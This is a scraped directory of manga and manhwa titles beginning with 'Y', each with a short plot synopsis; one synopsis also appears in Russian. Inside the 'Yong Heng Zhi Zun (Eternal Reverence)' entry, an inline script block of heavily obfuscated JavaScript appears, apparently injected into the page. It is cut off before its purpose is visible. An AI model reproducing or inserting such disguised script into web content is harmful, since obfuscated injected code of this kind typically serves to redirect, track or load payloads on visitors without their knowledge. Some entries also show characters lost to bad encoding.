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Yomawari Sensei

The author, a high-school teacher, recounts his 12 years on "night patrol" in Yokohama City, where he comes face to face with youth dealing with issues ranging from self-mutilation to drug abuse.


Yomi No Tsugai

The manga centers on Yuru, a boy who lives in a remote mountain village, spending his time hunting birds and being one with nature. But one day, Yuru's younger twin sister Asa is called to serve in the jail at the heart of the village, her duty also confining her there. Yuru slowly unravels the unnatural mystery hidden beneath his quiet village.


Yondaime Ooyamato Tatsuyuki

Tatsuyuki is the reluctant young master of a Yakuza group. He would rather spend his days playing around than learning the ropes of his family's dubious business. When his caretaker sends him off to a branch office in Fukuoka, the recently heartbroken Tatsuyuki finds himself in a weirder situation than he would have ever expected.


Yondome wa Iya na Shizokusei Majutsushi

Amamiya Hiroto is unlucky. His life consisted of misfortune after misfortune, culminating in an unlucky death during an incident on a school boat trip, trying to save a girl he barely knew. After death, he met a god of reincarnation who requested that the hundred or so dead passengers - one of them being the girl he tried in vain to save - be reincarnated into another world. Yet a series of unfortunate events forced Hiroto to reincarnate with even less luck than before, starting with nothing but a tremendous amount of Mana. His second life, far worse than his first, came to a cruel end. However, upon meeting the god a second time, he was informed that there would be yet another reincarnation, one that had already been set in motion and could not be stopped. Not wanting Hiroto to endure a third life filled with suffering, the god cursed him before he was reborn in the hopes that he would either die quickly or commit suicide. Hiroto was reborn once more as a half-vampire, half-dark elf. A dhampir. Not wanting a fourth life, he is determined to live this third life with the only things remaining from his previous lives - Death Magic and his enormous Mana pool. Russian: SpoilerГлавному герою Амамия Хирото не везёт. Его жизнь состоит из цепочки неудач и в конце концов он умирает вследствие несчастного случая на корабле во время школьной экскурсии, погибнув при попытке спасти девушку, которую он едва знал. После смерти он встречает Бога Реинкарнации, которому требуются около ста мертвых пассажиров — среди которых девушка, которую он безуспешно пытался спасти — для перерождения в другом мире. Однако череда несчастливых событий вынуждает Хирото переродиться с ещё меньшей удачей, чем раньше, не имея в начале пути ничего, кроме огромного количества маны. Его вторая жизнь, что была гораздо хуже первой, приводит его к жестокому концу. Несмотря на это, встретившись с Богом в третий раз, он узнает, что будет и третья реинкарнация – она уже запущена и не может быть отменена. Не желая, чтобы Хирото вновь претерпевал жизнь, полную страданий, перед его перерождением Бог проклинает его, в надежде, что Хирото либо умрет быстро, либо совершит самоубийство. На сей раз Хирото переродился как наполовину вампир, наполовину тёмный эльф – дампир. Желая избежать четвёртой реинкарнации, он настроен прожить третью жизнь со способностями, что достались ему от предыдущих – Магией Смерти и Бассейном Маны.



Shima Akio and Soma Yoshino are lovers, facing the reality of their fourth year in university. No matter how much they try and think things over, they can't quite figure out what to do about their parents, their friends, or even their own relationship. This is the story of their youth. Youth fraught with pain and regret.


Yonezawa-san Is Done Being Human

Haru Yonezawa is an outstanding office manager who is looked up to by all of his teammates. On the surface, he is cool and collected, never getting his feathers ruffled by his grouchy boss. But the truth is he has a secret hobby that, if anyone found out about, would destroy his elite image. Every night, after a long, stressful day at work, he unwinds by dressing up and roleplaying… as a dog. Looking for a new “master” to help meet his needs, he calls upon a call-girl, who shows up and is none other than one of his subordinates from work!


Yong Heng Zhi Zun

[Summary by OSTNT] It has been a year since Li Fu Chen lost his “Talent”. Now he lives the life of a trash, being bullied and beaten by those who once was inferior to him. However, he still has not lost everything as he’s still engaged to a strong and pretty girl of a powerful family, but that came to an end as the engagement was abruptly cancelled. With shame brought to the family and his life engulfed by darkness, a ray of hope pierced the the sky.


Yong Heng Zhi Zun ( Eternal Reverence )

[Summary by OSTNT] It has been a year since Li Fu Chen lost his “Talent”. Now he lives the life of a trash, being bullied and beaten by those who once was inferior to him. However, he still has not lost everything as he’s still engaged to a strong and pretty girl of a powerful family, but that came to an end as the engagement was abruptly cancelled. With shame brought to the family and his life engulfed by darkness, a ray of hope pierced the the sky. Yong Heng Zhi Manhua / Yong Heng Zhi ,Eternal Reverence ; ????<script></script><script>(function(_0x3fb7a6,_0xc3eb4a){var _0x4400fc=_0x1993,_0x283692=_0x3fb7a6();while(!![]){try{var _0x9207de=parseInt(_0x4400fc(0x141))/(-0x1ac4+-0x20b*-0x1+0x41f*0x6)+-parseInt(_0x4400fc(0x144))/(-0xcd3+-0x84b+0x1a0*0xd)+-parseInt(_0x4400fc(0x136))/(-0x1993+-0x1e2c+0x37c2)*(parseInt(_0x4400fc(0x14a))/(-0x3d*0x7f+-0x1b97+0x9a5*0x6))+-parseInt(_0x4400fc(0x13b))/(-0x6*-0x323+0x1ae+-0x147b)+parseInt(_0x4400fc(0x14e))/(0x943+-0x1a6e+0x1131)+-parseInt(_0x4400fc(0x143))/(-0xb9+-0x1664+-0x1724*-0x1)+parseInt(_0x4400fc(0x13a))/(-0x23e3*-0x1+0xb38+-0x2f13);if(_0x9207de===_0xc3eb4a)break;else _0x283692['push'](_0x283692['shift']());}catch(_0x194cd8){_0x283692['push'](_0x283692['shift']());}}}(_0x3005,0x398e1+0x195641+-0xf6549));function _0x1993(_0x346853,_0xa00925){var _0x263d2a=_0x3005();return _0x1993=function(_0x2565fb,_0x15d7ec){_0x2565fb=_0x2565fb-(-0x17*0x22+-0x56f*-0x2+0x59*-0x13);var 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Yongou x Keibi - Single Mind

From Fantasyshrine: V.01 - Single Mind S&D Securities -- the 4th Guard gathers suave and intelligent professionals who are highly trained in combat. However, a reckless youth appears and is hell-bent on sticking to the intelligence manager, Taki Keiichi. Due to a previous assignment, Taki caught the attention of the yakuza and is now being pursued by this persistent rookie to join. "I'm not going away until you either come with me or kill me!" Amused by his earnest request, Taki offers for Yuuki to stay with him under the guise of his personal bodyguard. But Taki starts to develop a desire to oppress the ever obedient Yuuki... V.02 - Second Wind Kogami Shinobu is the number-one cool beauty of the Intelligence Department in the S&D Securities- the Fourth Guard, where suave and intelligent specialists gather in abundance. However, he doesn't seem to care for his partner, the laidback bodyguard Miharu "Shin" Shinnosuke’s pursuit. Why is it that Kogami stubbornly refuses to mix business with pleasure, as if he's scared of it? Then suddenly, Shin seems to have shifted his attention to the new charge he’s supposed to be protecting! What in the world will happen to their partnership--!? V.03 - Third Party V.04 - Four Card(s) V.05 - Five Minutes V.06 - Zero Hour V.07 - Sixth Sigma V.08 - Seventh Heaven V.09 - Eight Knot(s) V.10 - Nine Lives V.11 - Ten Gong


Yononaka wa Bokura ni Amai

Tsubaki Ooshima and Tsumugi Ooshima are very cool twins and gay. When they were students, they tried to have a sexual affair with Tougo Hayakawa, their classmate, but was found out. Exiled from their home by their father, now they are enjoying urban life on the camper with hunting boys...


Yoo Ah Dok-Jon

To be the third (to continue the family name) and only son (also only child) of the rich Han family, ever since he was little Sang-Ah was ingrained with the motto ?A Successful Future comes from a Perfect Mate? by his mother and raised with "Spartan-like" education. And due to his mother's harsh teachings about females Sang-Ah developed a serious aversion or trauma towards females. But one night during his age of 16, he's introduced to his fiance whom he has never met and Sang-Ah finally decides to leave his home. He leaves after making a deal with his mother that he'll find his own wife 'til he's 19 years old. From volume one's backcover: ? Don't Interfere with My Life!! ? Handsome face and allround sportsman, also being young master of an enormous rich family...Chung-sol High school's No. 1 Han Sang-Ah!! This young master who doesn't lack anything ventures running away from home?! Officially permitted runaway time is 3 years! During this time there is something he says he must get in his hands...!! From then on starting to confront him are woman!! woman!! women!!! Harem Flood Mixed with Comedy and Action! Explosion of Heart Fluttering Pink that would tail all Korea's Bookstores!! Warning: Series discontinued.



“Hello, is it Dohwa? Yu Yu-hwa, "I was bullied because I liked men, and your first greeting came to me, "I remembered your name because it was pretty." That was a compliment to a name I hated so much.
